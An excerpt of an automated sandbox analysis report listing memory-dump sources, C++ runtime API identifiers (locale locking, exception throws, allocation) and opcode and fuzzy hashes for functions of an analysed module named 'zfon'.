                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                • Opcode ID: ce70adfcc3457c4c5b5756c4f99c44a9a6aa3f404df6a0a8152ffd43bb752157
                                                                                                • Instruction ID: 4934c4776da68fecdd0b341767d94744364676dbd891cb2330aa892657a225f3
                                                                                                • Opcode Fuzzy Hash: ce70adfcc3457c4c5b5756c4f99c44a9a6aa3f404df6a0a8152ffd43bb752157
                                                                                                • Instruction Fuzzy Hash: FD318F62E0CB92A1EA50DF1DE4410BA6765EB85BE0F580632EB5D077E5EF3CE446E700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                • Opcode ID: 4a1d74a696e101f9418e4c1aea131a48374db2b4b2725ffa4bef69a5475c1a62
                                                                                                • Instruction ID: 874f82d83c2f4e0b4ec4cfc5a4b1bc0719742ccc489a1528d28cea188dad5860
                                                                                                • Opcode Fuzzy Hash: 4a1d74a696e101f9418e4c1aea131a48374db2b4b2725ffa4bef69a5475c1a62
                                                                                                • Instruction Fuzzy Hash: 61314E62A0CAC2C2EF119F2DE4501B96761EB84BE0F580632EB5E477E5DF2CE547A710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 448217422-0
                                                                                                • Opcode ID: 3c1d6b78a54c44f3109820ffb5f30ff00c321022ebf7eabf3ec7dc4569d6136e
                                                                                                • Instruction ID: c8a63dcb2b1b2c7d461bb13dcd6f7c0968abdda3bc27c48c36824d4bad130ac6
                                                                                                • Opcode Fuzzy Hash: 3c1d6b78a54c44f3109820ffb5f30ff00c321022ebf7eabf3ec7dc4569d6136e
                                                                                                • Instruction Fuzzy Hash: BD316962A08AC3C1EE119F1DE8401B96761FB84BE0F580632DB5E077E9EF2CE5479740
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                • Opcode ID: 969cec1644bb856d1eac6f1a35742c42c096f944a53fd65e4cc6a2f1d40e8599
                                                                                                • Instruction ID: e61b826b5bee5445763484798ab2b0399838ad11f0d7a897748eb96bf61151d1
                                                                                                • Opcode Fuzzy Hash: 969cec1644bb856d1eac6f1a35742c42c096f944a53fd65e4cc6a2f1d40e8599
                                                                                                • Instruction Fuzzy Hash: BF317222E0CAD691EA119F2DE4410BA6764FB84BE0F584632DB5D077E5EF3CE546E700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: 0625cce8056e1fbeafd34c4cc32d65403063833f55f3c25b616fc9f327735a8f
                                                                                                • Instruction ID: ce489180b7ac4c55fa4c4b9d625eecfbd7a9462821a95dfb1b34a9987685759f
                                                                                                • Opcode Fuzzy Hash: 0625cce8056e1fbeafd34c4cc32d65403063833f55f3c25b616fc9f327735a8f
                                                                                                • Instruction Fuzzy Hash: AB317E62A0CA92C1EE10DF2DE4511B96760FB84BE0F680631DB6E077E5DE3CE5479740
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: 00f7dcfa46a85e9306d845bcb843d4a6e56abbb54567e8f720a27f441f54e1c1
                                                                                                • Instruction ID: 103da4e33bf567bc93797813b0b4ba1f8328395bf1c7d07443d7dabeeea58e3d
                                                                                                • Opcode Fuzzy Hash: 00f7dcfa46a85e9306d845bcb843d4a6e56abbb54567e8f720a27f441f54e1c1
                                                                                                • Instruction Fuzzy Hash: BC314E62A08BC2C1EE159F2DE4401B96761FB94BE4F580632DB5E077E9EF2CE5469700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: e86ab5f9cdefc02573e43571f9a92ddb28c7e6d3480c0a0ddba73d764e6f00cc
                                                                                                • Instruction ID: 86dc005c78f3aa5d76ec5a29439e731709ad13fc8da569387a207e454b05895c
                                                                                                • Opcode Fuzzy Hash: e86ab5f9cdefc02573e43571f9a92ddb28c7e6d3480c0a0ddba73d764e6f00cc
                                                                                                • Instruction Fuzzy Hash: 4A317C62A0CA92C1EE109F2DE4411BD6B61EB84BE0F580632DB5E07BE5DF3CE546D740
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                • Opcode ID: 6165060885fdf55755c7bfe429cfe0ecb5ffa73f15c25983cf5194c565986d20
                                                                                                • Instruction ID: c56ec01287bbd5ae1d3239085a083e4156f1c019b5d2474e9745e7275c490c11
                                                                                                • Opcode Fuzzy Hash: 6165060885fdf55755c7bfe429cfe0ecb5ffa73f15c25983cf5194c565986d20
                                                                                                • Instruction Fuzzy Hash: 2E315A62A0CAC6C1EE119F1DE4401B967A0FB84BE4F580632EB5E477E9DF2CE5479710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: a7b608efc1aee6970888407e30e28b4b43bd13f8e6f74a85ee7bf5bf6733577e
                                                                                                • Instruction ID: 90baafe6fb8c02b44982a9b79e52480400111e213e554397760659914da6f92f
                                                                                                • Opcode Fuzzy Hash: a7b608efc1aee6970888407e30e28b4b43bd13f8e6f74a85ee7bf5bf6733577e
                                                                                                • Instruction Fuzzy Hash: 6B315B62A0CAC291EE119F1DE8402B96764FB94BE0F580632EB5E077E5DF3CE5479710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: 507ce1a5e7d73154d3749011fcb4afab418e422a1bb32dfaea8c72d98d932c39
                                                                                                • Instruction ID: c07f02814effb2deabf8eb31cc7d213c75c1df825d6a2734fab35facc4f35ac9
                                                                                                • Opcode Fuzzy Hash: 507ce1a5e7d73154d3749011fcb4afab418e422a1bb32dfaea8c72d98d932c39
                                                                                                • Instruction Fuzzy Hash: 29313962A08AC6C1EE119F2DE8402B96760FB94BE0F584632EB5E077E5DF2CE547D710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: 3d07e47c0918bafadbea5d9194d2d850deff4b8fb05363baba3a438e069e2b82
                                                                                                • Instruction ID: 4ae6cebec4a035d0ce9770be12e2995f733c58d3eeb6553c8547ffa0a54b69cf
                                                                                                • Opcode Fuzzy Hash: 3d07e47c0918bafadbea5d9194d2d850deff4b8fb05363baba3a438e069e2b82
                                                                                                • Instruction Fuzzy Hash: 00314A66A0DAC2C1EE119F6DE8401B96760FB84BE0F584232EB5D077E5DE2CE5879700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: 0d78e737d81f217a5e139d1ad9bd1c52e5eafd2eeb45db34d52a84de9a5e6e57
                                                                                                • Instruction ID: 2348804bb77764c50e8fdc1ae1af2e95e9e46fd1326bb44086566bc576eb0e11
                                                                                                • Opcode Fuzzy Hash: 0d78e737d81f217a5e139d1ad9bd1c52e5eafd2eeb45db34d52a84de9a5e6e57
                                                                                                • Instruction Fuzzy Hash: DD318122E0CAD291EA109F2DE8410BA6765FB85BE0F584632DB5D077F5EF3CE546A700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                • Opcode ID: 1c6ec3c157523f750c870b3272d3ff34d44e14e99ad9b27563f0911ed95044f1
                                                                                                • Instruction ID: 6052d4a251719145285e3d2b6ec06eba7d9bfc941e8c2c372a56df3f9565a7dc
                                                                                                • Opcode Fuzzy Hash: 1c6ec3c157523f750c870b3272d3ff34d44e14e99ad9b27563f0911ed95044f1
                                                                                                • Instruction Fuzzy Hash: 41315A62A08AC2D1EE119F2DE4402B96761FB84BE0F580632DB5E077E9EF3CE5479710
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _lock_locales
                                                                                                • String ID:
                                                                                                • API String ID: 3756862740-0
                                                                                                • Opcode ID: e468151b5c2f458411b05d44ceda21bf334e284b4bb9150f2ddfd9151ffbaf81
                                                                                                • Instruction ID: 45e6fd083ffa67a9787d3951cc25fd006bf11f3cd087ac96d34c9902dcfdbabe
                                                                                                • Opcode Fuzzy Hash: e468151b5c2f458411b05d44ceda21bf334e284b4bb9150f2ddfd9151ffbaf81
                                                                                                • Instruction Fuzzy Hash: 9C315A62A08AD2D1EE10DF2DE4411B96760FB84BE0F584632EB5E477E5DF3CE6469700
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _lock_locales
                                                                                                • String ID:
                                                                                                • API String ID: 3756862740-0
                                                                                                • Opcode ID: 374a708f4c027f64f3bbde7d98aa8f2f3ec5882c15b9587f9c8a1f9dbcedd78d
                                                                                                • Instruction ID: 9d69bb7ef047134b8857cefcbf49ab43607dc2720789adca7ed32db4a189c7ec
                                                                                                • Opcode Fuzzy Hash: 374a708f4c027f64f3bbde7d98aa8f2f3ec5882c15b9587f9c8a1f9dbcedd78d
                                                                                                • Instruction Fuzzy Hash: DA314D22A0DAC2C1EF119F1DE4501B96765FB94BE0F584232EB5D077E9EE3CE5869700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_locale_name_funcfreemallocmemcpywcsnlen
                                                                                                • String ID:
                                                                                                • API String ID: 3567269174-0
                                                                                                • Opcode ID: f30811991d692bedc0c7a1c88b05bcfd0119dbfede1abc1abae9bd436faa4321
                                                                                                • Instruction ID: 10a81f1c6100b17a05ec717aca37c669aae098dbbeffd30fbe75e90fa9915ecd
